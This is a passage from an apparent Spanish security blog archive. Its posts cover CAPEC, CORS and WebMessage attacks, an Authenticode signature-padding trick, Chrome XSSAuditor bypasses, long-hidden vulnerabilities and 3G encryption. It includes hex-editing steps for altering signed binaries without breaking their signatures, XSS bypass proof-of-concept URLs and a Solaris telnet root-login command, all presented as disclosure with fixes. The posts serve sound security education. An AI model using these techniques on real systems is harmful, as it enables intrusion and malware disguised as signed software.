instrucciones vienen detalladas en la página web. Sin embargo vale la pena mencionar que todo el proceso se basa en rellenar el formulario que nos suministran dentro del enlace con los detalles del ataque. Entre los más relevantes se encuentran: Precondiciones necesarias. Métodos del ataque (analysis, brute force, flooding, injection, spoofing, etc). Conocimientos o habilidades requeridas para poder llevar a cabo este ataque. Posibles soluciones o mitigaciones. Debilidades asociadas (CWE-IDs) Referencias, donde se suele hacer referencia a publicaciones que detallen o corroboren la propuesta del patrón de ataque propuesto. En el enlace "Documents" se pueden encontrar todos los documentos públicos relacionados con CAPEC. En el enlace "Search the Site" pueden realizarse búsquedas específicas de patrones de ataques utilizando palabras clave. Esto es muy útil si no se conoce el CAPEC-ID del patrón pero se tiene una idea del nombre o las palabras que pueden estar relacionadas con él. Y por último, los enlaces "Vulnerabilities (CVE)" y ‘Software Weakness Types (CWE)’ que conectan esta lista con las dos antes explicadas para poder consultarlas en caso de ser necesario. Las tres listas del MITRE mencionadas están estrechamente vinculadas, es decir, una vulnerabilidad es explotada gracias a una debilidad conseguida en un software, que a su vez ha sido aprovechada a través de un patrón de ataque. Por tanto cada vez que cualquiera de las tres listas recibe una nueva entrada, ésta es considerada, comprobada y estudiada, por lo que muy probablemente se puedan generar o complementar los registros en cualquiera de las otras. En nuestras siguientes entradas hablaremos de las otras dos siglas relacionadas con el ámbito de las vulnerabilidades: CVSS y CVRF. * Ocho siglas relacionadas con las vulnerabilidades (I): CVE * Ocho siglas relacionadas con las vulnerabilidades (III): CVSS * Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS Umberto Francesco Schiavo umberto.schiavo@11paths.com
31 de enero de 2014
Intercambio de datos entre páginas: SOP, CORS y WebMessage (y II)
Los navegadores son las aplicaciones más usadas por los usuarios a causa del desplazamiento del escritorio "a la nube" y por la grandes posibilidades que abarcan. La creciente complejidad del navegador ha permitido potenciar sus funcionalidades y (en consecuencia) aumentar los problemas de seguridad y su criticidad. Pero además, ha exigido nuevos métodos de intercambio de información y protocolos. Veamos algunos. En el desarrollo web actual se pueden llegar a realizar múltiples peticiones AJAX a distintos componentes de la aplicación, como pueden ser gráficas que reciben JSON o un componente de login externo . Puesto que SOP puede llegar a ser una política demasiado restrictiva para satisfacer esta demanda en algunos casos, la tecnología CORS nace como solución para compartir recursos con otros dominios sin llegar a poner en peligro la integridad de la información que manejan... siempre y cuando se implementen correctamente. Usando CORS, se pueden realizar peticiones a otros dominios, como b.com. Fuente: http://linuxism.tistory.com/732 Cross Origin Sharing Resource (CORS) permite al navegador realizar una petición web a otro dominio que no cumpla con la política SOP siempre y cuando el dominio destino agregue la cabecera Access-Control-Allow-Origin , especificando a qué orígenes permite la petición. Por ejemplo: Access-Control-Allow-Origin: http://www.dominio-tercero.com Con apenas unas líneas, el navegador será capaz de realizar una petición XMLHttpRequest. Se observa cómo el flag Access-Control entra en juego: Código JavaScript para realizar una petición XMLHttpRequest En caso de que el servidor no responda con la cabecera Access-Control-Allow-Origin esperada, el navegador impedirá realizar la petición lanzando una excepción: Chrome rechaza la petición XMLHttpRequest por no incluir el dominio destino la cabecera Access-Control-Allow-Origin Por el contrario, si contiene la cabecera Access-Control-Allow-Origin, el código JavaScript obtendrá la respuesta en HTML o XML dependiendo del formato y continuará su ejecución. Como medida de seguridad, también es destacable que la cookie de sesión no se incluirá en la petición si el servidor no añade explícitamente la cabecera Access-Control-Allow-Credentials. De este modo, a menos que el servidor indique expresamente que quiere compartir sus recursos, el navegador no lo permitirá. Por otro lado los dominios que implementen esta funcionalidad añadiendo la cabecera Access-Control-Allow-Origin , permitirán al atacante leer el contenido de la página (lo que implica que además podrá evadir los Anti-Forgery Token que pueda contener la web). Un posible ataque Un escenario de ataque en el que el atacante obtuviese el contenido de una web interna y lo reportase, sería el siguiente: Diagrama funcional de un posible ataque. Fuente: http://application-aegis.blogspot.com.es/2012/06/html5-feature-cross-origin-resource.html El escenario consta de un servidor web interno que tiene habilitada la cabecera Access-Control-Allow-Origin a cualquier dominio representado con el asterisco (*), y una web atacante a la que el usuario accederá. Una vez el usuario accede al sitio web del atacante, este incluirá una porción de código JavaScript que se ejecutará y provocará una petición XMLHttpRequest al servidor interno: Código malicioso del atacante Tras obtener el contenido de la petición, el JavaScript realizará una petición POST al sitio del atacante incluyendo el contenido de la web interna para almacenarlo en el servidor. Por otro lado, Access-Control-Allow-Origin también permitiría evadir los Anti-Forgery Token. Este impedirá que un atacante pudiese forzar una acción en la web, sin que el usuario se diese cuenta. Gracias a que CORS comparte el contenido de la página, se podría montar la otra web en un contenedor o un IFRAME y obtener el token haciendo una consulta al árbol DOM o filtrando por expresiones regulares: Código para obtener el token de verificación En este caso imprimimos el token, aunque podría usarse para formar una petición con parámetros y con ello ejecutar una acción: Muestra del token de verificación CORS es una forma de intercambiar información entre dominios, y esta funcionalidad abre otro vector para permitir que CORS pueda ser utilizado como puerta trasera para enviar información fuera de un dominio. Por ejemplo, en el caso de la existencia de un XSS, podría enviar la cookie de sesión para realizar un hijacking. Sería un comportamiento similar a lo que se ha dado en llamar s hell of the future. En cualquier caso CORS no es la única manera de intercambiar información entre dominios, pues con HTML 5 aparecen más formas que facilitan esta tarea y así nuevos vectores de ataque. WebMessage Otra forma de comunicarse entre dominios es WebMessage que permite mandar y recibir mensajes mediante JavaScript sin necesidad de incluir una cabecera. Para usar esta funcionalidad basta con indicarlo en el JavaScript del "servidor" que recibirá el mensaje con un manejador de eventos y en la parte cliente que enviará el mensaje: Código JavaScript del servidor para recibir para e imprimir el mensaje Código JavaScript para enviar el mensaje Es importante tener en cuenta de que en caso de que el "servidor" no maneje los mensajes, estos nunca llegarán. Al necesitar un manejador explícito para usar WebMessage no se implementa SOP directamente, por lo que es importante comprobar el origen del cliente, porque si el servidor no comprueba el origen en su lógica, podría ser usado (y abusado) por otros dominios. Además también es importante comprobar el contenido enviado por el usuario porque podría ser un vector de ataque para realizar un XSS a través de WebMessage: Ejemplo de XSS preparado con WebMessage * Intercambio de datos entre páginas: SOP, CORS y WebMessage (I) Oscar Sánchez oscar.sanchez@11paths.com
29 de enero de 2014
De cómo el malware modifica ejecutables sin alterar su firma
Microsoft acaba de arreglar (a medias) un método que permitía alterar un fichero firmado con Authenticode. Aunque el método fue descubierto en 2009, no ha sido hasta ahora, cuando se ha observado que ciertos programas han comenzado a usar la fórmula, que ha introducido una corrección (que todavía no se activa por defecto). Se trataba de aprovechar un fallo de diseño de Authenticode. Veamos cómo funcionaba. Varios métodos para cambiar la integridad sin alterar la firma Existían varios métodos para alterar una imagen de un binario firmado sin que el sistema se quejase de que la firma era incorrecta (de que se había alterado su integridad). El parche MS12-024, de abril de 2012, corrige algunos. Tiene el CVE-2012-015 y lo descubrieron Robert Zacek e Igor Glucksmann, de Avast. No se había observado en malware aún. Pero sí que existía un problema pendiente de arreglar. El truco era muy sencillo. Ya hemos hablado en varias ocasiones de Authenticode en este blog. Fundamentalmente, cuando se firma un binario, se calcula el hash de todo el flujo de datos del menos algunos pequeños huecos que "se salta": La cabecera del fichero llamada "Security directory RVA" (también llamada Certificate Table RVA) y el checksum del fichero completo. En 2009 se comprobó que era posible además añadir código al final de un ejecutable, sin alterar la firma. Aunque publicaron herramientas para conseguirlo, se demuestra manualmente de manera muy sencilla, con cualquier editor hexadecimal. El truco consiste en que se puede añadir código más allá del final del fichero y modificar las cabeceras correspondientes de tamaño. La última parte del fichero (entre 1 y 4 kbs), cuando se firma, corresponde a la estructura PKCS que contiene la firma en sí. En esta estructura se encuentra el certificado y toda la información criptográfica de la firma. Para engañar a Authenticode, se le puede simplemente indicar al fichero en su cabecera que la estructura PKCS es un poco más larga (cambiar el valor del tamaño) y que abarque la parte añadida. Así de simple. Cómo conseguirlo Es necesario modificar el valor "Security Directory Size". En el ejemplo usado, el tamaño del directorio (de la estructura PKCS) es 0x1918 bytes. Si se van a añadir, por ejemplo, 16 bytes (0x10), se modifica el valor de 0x1918 a 0x1928 en el valor de la cabecera correspondiente. Un fichero cualquiera firmado, y las cabeceras correspondientes. Se ha modificado el tamaño de 1918 a 1928 Este valor se repite más abajo en el fichero, en la estructura PKCS1_MODULE_SIGN.dwLength, que está dentro del PKCS. Encontrarlo es de nuevo muy sencillo. Se halla justo donde indique el offset de la cabecera Security Directory RVA. Se modifica ahí de nuevo el valor del tamaño. Pasa de de 0x1918 a 0x1928. En ese mismo archivo (offset 0046c858 indicado por Security Directory RVA) se modifica el valor del tamaño PKCS Luego, al final del fichero, se añaden los bytes necesarios con el texto o datos que se desee. En este caso, hemos añadido 16 bytes, comenzando por la palabra "ElevenPaths". Datos añadidos justo al final del fichero, con un editor hexadecimal Para comprobar que el tamaño del PKCS calculado es correcto, podemos simplemente restar el tamaño final del fichero (hasta dónde llegan nuestros datos añadidos) y el del offset donde comienza el PKCS (el valor de la cabecera). En el ejemplo, 0x46e180 - 0x46c858 = 0x1928. Este resultado debe corresponder con el dato que hemos modificado. Al comprobar la firma, dirá que todo está correcto, y que no se ha perdido la integridad del binario, aunque lo hemos modificado hasta en tres puntos. Por completar, se podría modificar y actualizar la cabecera del checksum, pero no es imprescindible (Authenticode no lo tiene en cuenta). Firma correcta del fichero de prueba, aun habiendo modificado hasta tres puntos diferentes. ¿De qué sirve añadir código ahí y por qué lo han corregido? Esquema de cómo el malware se aprovechaba de instaladores que acudían al Payload para descargar Microsoft ha reaccionado a este problema cuando se ha encontrado malware (o al menos, pruebas de concepto) aprovechando el problema. De hecho, parece que fue Didier Stevens quien dio la voz de alarma este año. Encontró instaladores firmados válidos, cuyo código acudía a esa parte extra del fichero no firmado. Ahí habían añadido una URL de la que descargaba otro ejecutable. Este ejecutable descargado ya no estaba firmado. Así, firmaban una sola vez un ejecutable, pero conseguían que sirviera para muchas instalaciones diferentes. Solo había que cambiar la parte añadida del binario, una URL en el payload, sin volver a firmar (la integridad se mantenía) y apuntar a otra URL donde se descargaba otro código. Firma una vez, instala cualquier cosa. Cómodo... pero peligroso. El malware, sin embargo, ha visto en este método del instalador una oportunidad de pasar como instalador válido de un tercero, firmado, y descargar malware a su gusto. Ingenioso. ¿Cómo lo han corregido? El parche MS13-098 comprueba que, tras el bloque PKCS propiamente, no se encuentran datos que no sean diferentes de cero. Si es así, la firma no será válida. Deja abierta la puerta a otros ataques, como reconoce la propia Microsoft, pero dependen ya de una muy mala práctica de los desarrolladores (introduciendo datos no firmados en la propia estructura PKCS...) Pero este parche no estará activo hasta junio de 2014. Si se quiera activar ya, es necesario realizar un cambio en el registro (añadiendo un REG_SZ en la ruta adecuada con el valor indicado). Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESoftwareMicrosoftCryptographyWintrustConfig] "EnableCertPaddingCheck"="1" En los sitemas de 64 bits, modificar además para binarios compilados nativamente en este arquitectura. [HKEY_LOCAL_MACHINESoftwareWow6432NodeMicrosoftCryptographyWintrustConfig] "EnableCertPaddingCheck"="1" Y reiniciar. Teniendo en cuenta los problemas criptográficos que tuvo Microsoft con TheFlame a causa de una cadena de errores simples,... debería haber reaccionado antes a este problema y no tardar casi 5 años en solucionarlo. Sergio de los Santos ssantos@11paths.com @ssantosv
24 de enero de 2014
Cómo eludir el filtro antiXSS en Chrome y Safari (descubierto por Eleven Paths)
Los navegadores modernos cuentan con un filtro antiXSS que protege a los usuarios de algunas de las consecuencias de este tipo de ataques. Normalmente, bloquean la ejecución de cross site scriptings de forma que el código inyectado (normalmente JavaScript o HTML) no se ejecuta en el navegador de la víctima. Chrome llama a este filtro XSSAuditor. Nuestro compañero Ioseba Palop descubrió una manera de eludirlo hace meses. Puesto que ya se ha resuelto en la versión principal de Chrome, publicamos los detalles técnicos. En ElevenPaths, hemos encontrado una forma de eludir el filtro antiXSS de Chrome. Esto significa que si la víctima visita una web con un problema de XSS del que se está intentando aprovechar un atacante, no estaría totalmente protegido. El fallo se basa en un uso incorrecto del atributo srcdoc de la etiqueta IFRAME, incluido en la definición de HTML5. Para realizar un ataque XSS en el navegador Google Chrome usando este fallo, la web debe incluir un IFRAME y debe ser capaz de leer cualquier atributo de este elemento desde parámetros HTTP (GET o POST) sin aplicar filtrado de caracteres. Después, en el parámetro IFRAME, el atributo srcdoc se puede incluir con código JavaScript. Chrome no lo filtra y se ejecutará. Para reproducir la PoC, debería haber una página con un IFRAME como este. Y la inyección HTML en el parámetro src sería: Ahora la víctima podría visitar: http://demofaast.elevenpaths.com:9002/xssbypass/iframebypass.php?iframe=%22srcdoc=%22%3Cscript%3Ealert('Bypass%20message')%3C/script%3E y el filtro antiXSS fallaría y dejaría correr el script. Google derivó el problema a Chromium, que no trata estas elusiones como problemas de seguridad, puesto que XSSAuditor se considera una línea de defensa secundaria. El problema se reportó el 23 de octubre. Lo arreglaron dos días después, haciendo que XSSAuditor cazara las propiedades reflejadas de srcdoc incluso sin una inyección en la etiqueta "IFRAME",. Chrome lo ha corregido en su versión 32.0.1700.76. Otro fallo Hace unas semanas, en este post, alguien se fijó en nuestra PoC como inspiración y desarrolló otra forma de eludir el filtro. Este fallo todavía no está corregido. El truco es inyectar una etiquesta "script" de apertura en un parámetro que se escriba directamente en el stream de salida de la respuesta HTTP (es decir, sin filtrar ningún carácter al igual que en el caso anterior). Bajo esta escritura debe existir contenido dentro de etiquetas scripts que pertenezcan a la propia página. El comportamiento del navegador será incluir nuestra inyección (recordemos que sin cierre de etiqueta), obviar la apertura de "script" de la propia web, y ahora sí, utilizar el cierre de la propia web para generar un script bien formado y ejecutarlo sin ningún tipo de problema, consiguiendo así un bypass de XSSAuditor. Esta es la PoC que hemos subido: http://demofaast.elevenpaths.com:9002/xssbypass/scriptbypass.php?value=%3Cscript%3Ealert%28%22Bypass%20Message%22%29 Safari, todavía vulnerable Safari para Mac e iPhone también son vulnerables. Confirmaron la recepción del correo, y nos dijero que estaban trabajando en ello. Parece que todavía lo están, puesto que el programa aún es vulnerable. Cada vez que se ha intentado contactar con ellos, la respuesta que no había novedades y que estaban trabajando en ello. El filtro de Internet Explorer impide la ejecución, y Firefox no implementa ningún filtro anti XSS.
20 de enero de 2014
Vulnerabilidades escurridizas, invisibles en el código durante años
Hace poco se ha corregido una vulnerabilidad de desbordamiento de pila que afecta al servidor X11. Llevaba "escondida" en el código desde 1991, presente en muchas de las distribuciones Linux y permitiendo, para quien la conociese, elevar privilegios en el sistema afectado. ¿Existen otros casos de vulnerabilidades que han pasado desapercibidas durante años? El caso X11 X11 es un servidor gráfico desarrollador por el MIT a mediados de los 80 que proporciona interfaz gráfica a los sistemas basados en UNIX. A principios de 2014, y usando una herramienta llamada cppcheck, se ha encontrado un desbordamiento de pila a la hora de procesar fuentes BDF con la librería libXfont. Básicamente, esto permite a un atacante local elevar privilegios a root haciendo que el sistema procese un tipo de letra especialmente manipulado. La sencillez del parche (que simplemente limita el tamaño) explica el problema. Se trata de un desbordamiento de pila "de libro"). - if (sscanf((char *) line, "STARTCHAR %s", charName) != 1) { + if (sscanf((char *) line, "STARTCHAR %99s", charName) != 1) { bdfError("bad character name in BDF filen"); goto BAILOUT; /* bottom of function, free and return error */ } Página de descarga de cppcheck.sourceforge.net X11, aun siendo un software extremadamente usado y popular, contuvo durante 23 años una vulnerabilidad, en principio, que parecía bastante sencilla de detectar por el ojo humano, pero que en realidad tuvo que se cazada con la ayuda de un programa automático . Un caso Solaris El 12 de febrero de 2007 se da a conocer una vulnerabilidad en (por aquel entonces) Sun Solaris 10 tan simple como sorprendente. El fallo permitía el acceso trivial como cualquier usuario (incluido root) a través de telnet. El error fue ya descubierto y corregido en sistemas UNIX en 1994, pero Solaris lo "reintrodujo"en sus sistemas en noviembre de 2002, con lo que pasó inadvertida durante unos 5 años. A través de un simple parámetro del cliente telnet ("-f", utilizado para traspasar las credenciales locales), se podía acceder a un servidor telnet en Sun Solaris 10 sin necesidad de autenticación. Sólo conociendo el nombre de usuario. El comando para "explotar" el fallo era: telnet -l "-froot" [direccion_del_host] El código del demonio telnet en Solaris 10 es abierto. Un caso Oracle El fallo CVE-2012-1675 en Oracle, reconocido por la compañía en abril de 2012, f ue reportado en 2008 por Joxean Koret (@matalaz). Afectaba a todas las versiones de Oracle Database (desde 8i hasta la versión 11g R2). La vulnerabilidad permitiría controlar el tráfico cliente-servidor y modificarlo, a través de un ataque MITM. Aunque se reportó en 2012, la vulnerabilidad estaba en el código probablemente desde 1999. Además de la antiguedad del problema, Oracle protagonizó un episodio vergonzante en la gestión de parches. Koret, creyendo que había sido por fin solucionado, publicó todos los detalles. Haciendo gala de una respuesta totalmente absurda, Oracle respondió que en realidad "the vulnerability was fixed in future releases of the product", lo que no tenía sentido (fue corregida en futuras versiones). Un caso Windows A principios de 2007, todo el mundo hablaba de la vulnerabilidad de los Windows MetaFile (WMF) que supuso una pesadilla para Microsoft por muchas razones (se llegó a sacar un parche extraoficial por la comunidad, antes que la propia Microsoft). Era tan sencilla de explotar que Steve Gibson llegó a insinuar que podría ser intencionada, una puerta trasera incluida a propósito en el sistema operativo más famoso. El fallo estaba basado en los registros de tipo META_ESCAPE, concretamente en el subcódigo SetAbortProc. En ella se deben especificar dos argumentos, uno que representarían el "Device Context" y el segundo sería una función a ejecutar ante un evento de cancelación de impresión. Controlarlos y ejecutar código era tan sencillo como enviarles los comandos adecuados. Stephen Toulouse escribió además en el blog oficial de Microsoft que el fallo estaba presente desde los tiempos de Windows 3.0, creado hacia 1990. SetAbortProc fue programada cuando la seguridad no representaban la mayor de las prioridades y fue introducida en los tiempos en los que procesar imágenes era lento y quizás fuese necesario abortar el proceso de impresión antes de que terminara, mucho antes incluso de que existiera el formato WMF. Aunque la funcionalidad fue perdiendo importancia, se fue portando junto con muchas otras, versión tras versión, en lenguaje ensamblador a los siguientes sistemas operativos que surgieron después. Se mantuvo por tanto unos 17 años en el código sin que nadie lo detectara. Ni siquiera los profesionales que se dedican a tiempo completo a encontrar fallos en Windows (que los hay). ¿Cómo puede ocurrir esto? Los ejemplos expuestos son los más llamativos y escandalosos. Hay más ejemplos de todo tipo, en código abierto y cerrado. De hecho, todos los días se corrigen vulnerabilidades en sistemas operativos o programas que llevan años funcionando, y quizás las vulnerabilidades corregidas hoy llevan ahí ocultas desde que se usa ese sistema. Por ejemplo, muchas vulnerabilidades que se siguen encontrando en XP puede que estén ahí desde octubre de 2001, cuando fue sacado al mercado. Las vulnerabilidades son inevitables, tanto en el diseño de programas como de protocolos. En este sentido, el fallo de Kaminsky en los DNS descubierto en 2008 es un buen ejemplo de un fallo de diseño que pasó desapercibido durante decenas de años, aun siendo un estándar completamente abierto aprobado en su teoría e implementado en la práctica por decenas de compañías. istruecryptauditedyet.com Poco parece que tenga que ver la eterna discusión sobre el código abierto o cerrado y las ventajas frente a la detección "temprana" de vulnerabilidades. Sin entrar en el aspecto filosófico del uso de software de código abierto, ¿en realidad resulta más sencillo encontrar vulnerabilidades en programas muy complejos de código abierto que en programas muy complejos de código cerrado? Un buen ejemplo es el caso TrueCrypt. Aunque sea de código abierto, sus usuarios necesitamos poder fiarnos totalmente de él, dada su importancia para proteger la confidencialidad. Pero para conseguirlo, se ha precisado de una campaña de recogida de fondos para (entre otras cosas) poder permitirse auditar su código, y premiar a los auditores que encuentren fallos en él. Llevan ya varios meses con el proyecto, y su sueño (porque no es fácil) sería realmente conseguir una auditoría completa de un código tan complejo como es cualquiera que trabaje con criptografía. Otro ejemplo de lo difícil que es auditar (o encontrar errores) en código en general y criptográfico en particular, es el desastre ocurrido en el demonio openSSL de Debian, que eliminó la entropía de creación de claves públicas y privadas en 2006. Nadie lo notó durante dos años. Todo esto viene a recordar que de esos "miles de ojos" que pueden mirar el código, no son todos igual de efectivos... que algunos programas son más eficaces que el ojo humano, y que el hecho de que se permita mirar el código no significa que todo el mundo lo mire ni lo entienda realmente. El código abierto tiene muchas ventajas (prácticas y teóricas): en programas muy complejos una que sí se aprovecha en la práctica es que permite entender y mitigar (pero quizás no tanto detectar) las vulnerabilidades más rápidamente. Por supuesto, se puede argumentar que, si no fuese código abierto, no se hubiesen encontrado nunca estos fallos. Es posible. Defender uno u otro modelo es un asunto delicado para muchos. Lo que no hay que olvidar en cualquier caso es que auditar código desnudo es una tarea muy compleja que no puede ser delegada exclusivamente a programas. Necesita además del ojo humano, pero no cualquiera... no los "miles de ojos potenciales", sino de "pocos pero reales" que cuentan con gran experiencia, que son buenos programadores, profesionales, que saben interpretar correctamente los resultados de los programas automáticos de auditoría, que disponen de paciencia, tiempo... Y no se dedican todos estos recursos a todos los programas de código abierto (ni cerrado) "mágicamente". De hecho, lamentablemente, encontrar vulnerabilidades es una tarea a la que los atacantes profesionales parecen dedicar mucho más esfuerzo y empeño que cualquier comunidad o auditores y se centran en cualquier programa que les reportes beneficios, independientemente de la filosofía de código. Sergio de los Santos ssantos@11paths.com @ssantosv
15 de enero de 2014
Arquitectura y cifrado de seguridad en redes 3G
Las redes de telefonía móvil, por su naturaleza radioeléctrica, son tanto o más vulnerables que otras redes de comunicaciones. Con su uso generalizado, garantizar la seguridad en este tipo de redes cobra mayor importancia. El estándar UMTS (Universal Mobile Telecommunications System) de telefonía 3G implementa un esquema de seguridad específico que intenta garantizar la confidencialidad y la integridad de la información enviada a través de la interfaz radio, ya sean datos de usuario o de señalización. ¿ Cómo lo hace? Y, sobre todo... ¿lo consigue? Fundamentalmente usamos hoy en día dos tecnologías: 2G: Que es la combinación de GSM para voz (en Europa, porque en Estados Unidos se puede usar CDMA) y GPRS para datos. Estos estándares pueden ir cifrados o no, pero si lo están, ya se conocen formas de romperlo en un tiempo razonable. Además tiene un problema adicional: en el mundo 2G, el teléfono se autentica contra la torre pero no al revés. Por tanto se pueden "falsificar". 3G: UMTS, del que hablaremos. La estación base (torre) sí se autentica contra el teléfono. Actualmente, 2G es un desastre porque permite a un atacante suplantar la estación base (la torre) y que el teléfono se conecte a ella sin dudarlo. A todo esto ayuda bastante que los teléfonos "degraden" la conexión a 2G cuando lo necesitan y que uno de los modelos más usados (el iPhone) no permita evitar este comportamiento. Además, un atacante podría montar una estación base por relativamente poco dinero (actualmente, unos pocos miles de euros). El teléfono puede, para ahorrar batería o porque la señal es más fuerte, conectarse a esa estación base falsa que emite en 2G y ofrecer todos sus datos. Arquitectura UMTS A grandes rasgos, el sistema UMTS está dividido en dos grandes bloques lógicos: El núcleo de red (Core Network, CN) desempeña labores de control de tráfico, señalización, conmutación y encaminamiento. Además, hace posible la conexión de UMTS con otras redes de comunicaciones. Reutiliza varios elementos ya presentes en la arquitectura 2G y soporta tanto conmutación de paquetes como conmutación de circuitos. La red de acceso radio (UTRAN) se encarga de los aspectos de comunicaciones, tales como la gestión de los recursos radio, el control de potencia y el traspaso de llamadas. Sus elementos principales son los controladores de red (RNC), que se encargan de gestionar una o varias estaciones base que dan cobertura a los terminales de usuario. Arquitectura UMTS. Fuente: Wikipedia Dado que la CN hereda elementos de la arquitectura 2G, es frecuente ver estaciones base GSM y UMTS coexistiendo dentro de una misma red móvil. Arquitectura de Seguridad UMTS La arquitectura de seguridad de UMTS está compuesta por un conjunto de características y mecanismos de seguridad. Un mecanismo de seguridad es un elemento que proporciona una característica de seguridad. Y una característica de seguridad es una funcionalidad de un servicio que satisface uno o varios requisitos de seguridad. Brevemente, en UMTS tenemos cinco grupos de características de seguridad, cada uno orientado a hacer frente a ciertas amenazas y alcanzar determinados objetivos. Seguridad en el acceso a la red (I en la figura): Proporciona acceso seguro a los servicios y protege contra ataques en el enlace radio. Seguridad en el dominio de red (II): Permite a los nodos del operador de red intercambiar datos de señalización de forma segura, y protege contra ataques en la red cableada. Seguridad en el dominio del usuario (III): Permite a los usuarios disponer de acceso seguro a las estaciones móviles. Seguridad en el dominio de aplicación (IV): Permite que las aplicaciones en el dominio de usuario y en el dominio del proveedor intercambien mensajes de forma segura. Visibilidad y configuración de seguridad: Permite al usuario obtener información sobre las características de seguridad que se están utilizando. Arquitectura de seguridad UMTS. Fuente: www.etsi.org En UMTS, por otra parte, tenemos tres grandes mecanismos de seguridad: el sistema de autenticación y acuerdo de claves; los algoritmos de integridad y confidencialidad; y el cifrado en bloque KASUMI. Los vemos a continuación. UMTS Authentication and Key Agreement El UMTS AKA es el mecanismo que gestiona todo el proceso de autenticación, basándose en un protocolo de tipo desafío-respuesta. Son los que se suelen utilizar para que una entidad verifique la identidad de otra sin revelar una clave compartida común. El proceso UMTS AKA es gestionado por el registro de ubicación de visitante (Visitor Location Register, VLR), y consta de los siguientes pasos: El VLR envía al Registro de ubicación base (Home Location Register, HLR) del abonado una petición de autenticación. El HLR computa un conjunto de vectores de autenticación (AV1:AVn) a partir de la clave privada K del usuario (que solo se almacena en la propia USIM y en el HLR/AuC), y lo envía al VLR, que los almacena. El VLR escoge uno de los vectores de autenticación (AVi), y desafía a la USIM enviándole los campos RAND y AUTN (token de autenticación) del vector seleccionado. La USIM del usuario procesa el token de autenticación, y mediante su clave privada K puede comprobar que los datos recibidos solo pueden provenir de alguien que tenga acceso a esa clave, por lo que de esta forma la red queda autenticada frente al usuario. La USIM procede entonces a generar una clave de confidencialidad (CK), una clave de integridad (IK), y una respuesta para la red (RES). La USIM envía la RES al VLR. Como el VLR conoce el AV, puede computar la respuesta esperada (XRES), y contrastar la RES que recibe con ésta. De esta manera el usuario queda autenticado también. El VLR computa entonces CK e IK a partir del AV. Las CK e IK establecidas son transmitidas por la USIM y el VLR a las entidades encargadas de las funciones de integridad y cifrado (generalmente el RNC). Mecanismo de control de integridad La información de señalización es vital tanto para el usuario como para la red, por lo que es fundamental poder garantizar su integridad (para prevenir, por ejemplo, ataques de falsa estación base). Así, se implementa tanto en la estación móvil como en el RNC el llamado algoritmo f9. El proceso de verificación de integridad es como sigue: Mecanismo de control de integridad UMTS. Fuente: www.etsi.org El dispositivo del usuario calcula un código de autenticación de mensaje de 32 bits (MAC-I) a partir de ciertos parámetros de entrada, entre ellos los propios datos y la IK que se obtuvo en el proceso de autenticación. El MAC-I calculado se adjunta a los datos de señalización y se envía al controlador de red. Una vez que el controlador de red recibe la información de señalización con el MAC-I adjunto, calcula, empleando el mismo método que el dispositivo de usuario, el XMAC-I. La integridad de la información de señalización se comprueba comparando MAC-I y XMAC-I. Mecanismo de control de confidencialidad La confidencialidad de la información transmitida es esencial tanto para el usuario como para el operador móvil. De la comprobación de confidencialidad se encarga el denominado algoritmo f8, que funciona de la siguiente manera: El dispositivo de usuario, a partir de la CK previamente calculada durante la autenticación y otros parámetros, calcula una secuencia de cifrado. Se realiza un XOR entre esta secuencia de bits y los datos, obteniendo un bloque de datos cifrados. Estos datos cifrados se envían a la red a través de la interfaz radio. El RNC, a partir de los mismos parámetros que el dispositivo de usuario (incluyendo la CK compartida), genera la misma secuencia binaria de cifrado. Realizando una operación XOR entre esta secuencia y el bloque cifrado recibido, se recuperan los datos originales. Mecanismo de control de confidencialidad UMTS. Fuente: www.etsi.org Algoritmo de cifrado por bloque KASUMI Los algoritmos f8 y f9 de integridad y confidencialidad están basados en el algoritmo KASUMI. Este algoritmo de cifrado por bloque está desarrollado a partir de MISTY-1, y presenta una estructura de Feistel que opera con una clave de 128 bits sobre entradas y salidas de 64 bits. Estructura Kasumi. Fuente: http://eprint.iacr.org/2010/013.pdf El algoritmo KASUMI realiza ocho iteraciones o rondas y, para cada una, genera un conjunto de claves de ronda a partir de la clave K de 128 bits. Con esas claves de ronda se computa una función f, diferente para cada ronda. Cada una de estas funciones f i está compuesta por dos subfunciones, FL i y FO i , que dependen de los datos de entrada a esa ronda y de las claves. Mientras que la función FL es relativamente sencilla (operaciones lógicas y desplazamientos binarios), la función FO presenta internamente una estructura de Feistel propia consistente en tres rondas, para cada una de las cuales se computa una subfunción FI que consta a su vez de otras tres rondas. Debido a su complejidad, el algoritmo KASUMI ofrece un grado de seguridad elevado. Fue escogido por la 3GPP para la implementación de los algoritmos de confidencialidad e integridad en redes UMTS, además de integrarse posteriormente en las redes 2G. Sin embargo, varios equipos de investigación han intentado romperlo. Ya en 2003 se realizó una primera aproximación, que si bien no rompía el cifrado, lo eludía, haciendo posibles ataques MITM en GSM. Posteriormente, en 2005, investigadores israelíes propusieron un ataque boomerang contra KASUMI, que en realidad no resultaba práctico por su excesiva complejidad, pero comenzaba a medrar la confianza en el algoritmo. Finalmente, en 2010, investigadores del Weizmann Institute of Science de Israel consiguieron romperlo, obteniendo la clave completa en menos de dos horas utilizando un PC de sobremesa (y gracias a una tabla que fue previamente precomputada durante meses). Este ataque, curiosamente, no es efectivo contra el cifrado MISTY-1, que ha probado ser más robusto (pero también más consumidor de recursos) que KASUMI en contra de lo que sostenía inicialmente la 3GPP. En general, los mecanismos anteriores hacen de UMTS un estándar relativamente seguro para la comunicación. Especialmente la doble autenticación (usuario-red y red-usuario) hace que UMTS sea difícil de vulnerar frente a ataques de hombre en el medio de falsa estación base, mientras perpetrar estos ataques en GSM resulta sencillo. Aunque el cifrado pueda considerarse fácil de romper, obtener el tráfico cifrado a través de ataques MiTM resultaría muy complejo para el atacante. Las recientes tecnologías 4G, por otra parte, buscan mitigar los problemas de la actual generación. Entre las prestaciones de seguridad de LTE podemos encontrar la reutilización de la autenticación y acuerdo de claves UMTS, nuevos algoritmos para integridad y confidencialidad (SNOW 3G, AES) y una jerarquía de claves más profunda, con claves de hasta 256 bits. Cristóbal Bordiú cristobal.bordiu@11paths.com
13 de enero de 2014
I+D en troyanos bancarios: versiones de 64 bits y uso de TOR
